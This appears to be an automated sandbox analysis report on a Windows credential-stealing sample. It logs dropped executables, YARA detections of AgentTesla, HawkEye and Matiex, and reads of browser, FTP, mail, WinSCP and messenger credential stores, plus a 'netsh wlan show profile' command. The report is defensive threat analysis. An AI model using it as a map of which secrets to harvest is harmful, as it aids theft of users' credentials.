Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\PO456724392021.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match	File source: 00000008.00000003.291239624.0000000004451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.283351079.000000000134C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.289168879.0000000003E3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.287788541.00000000044BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.278201176.000000000138F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.285048922.0000000004451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.284660390.0000000000AB2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.278060140.0000000001324000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.287649744.00000000005D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.287852153.0000000003DD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.612763581.0000000002D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.604664953.0000000000AB2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.286730546.00000000044BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.612958072.0000000002DD2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe, type: DROPPED
Source: Yara match	File source: 12.0.PO456724392021.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.PO2345714382021.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.PO456724392021.exe.ab0000.0.unpack, type: UNPACKEDPE

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.327595878.000000000295F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pictures.exe PID: 6240, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED
Source: Yara match	File source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE

Yara detected MailPassView

Show sources

Source: Yara match	File source: 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.329671193.0000000003921000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.301913637.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pictures.exe PID: 6240, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED
Source: Yara match	File source: 19.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE

Yara detected Matiex Keylogger

Show sources

Source: Yara match	File source: 00000009.00000002.604546258.0000000000DB2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.281199501.0000000000DB2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LOGO AND PICTURES.exe PID: 6208, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe, type: DROPPED
Source: Yara match	File source: 9.0.LOGO AND PICTURES.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.LOGO AND PICTURES.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal WLAN passwords

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match	File source: 00000014.00000002.308380033.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.281411863.0000000004450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.329671193.0000000003921000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.323788934.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.277852049.0000000003760000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.282912644.0000000000152000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.298778649.0000000000403000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Pictures.exe PID: 6240, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 5336, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Pictures.exe, type: DROPPED
Source: Yara match	File source: 10.0.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Pictures.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.B6LNCKjOGt5EmFQ.exe.400000.0.unpack, type: UNPACKEDPE

Source: Yara match	File source: 00000009.00000002.611843586.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.612763581.0000000002D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.612958072.0000000002DD2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LOGO AND PICTURES.exe PID: 6208, type: MEMORY

Remote Access Functionality:

Detected HawkEye Rat

Show sources

Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.293576161.0000000004C48000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
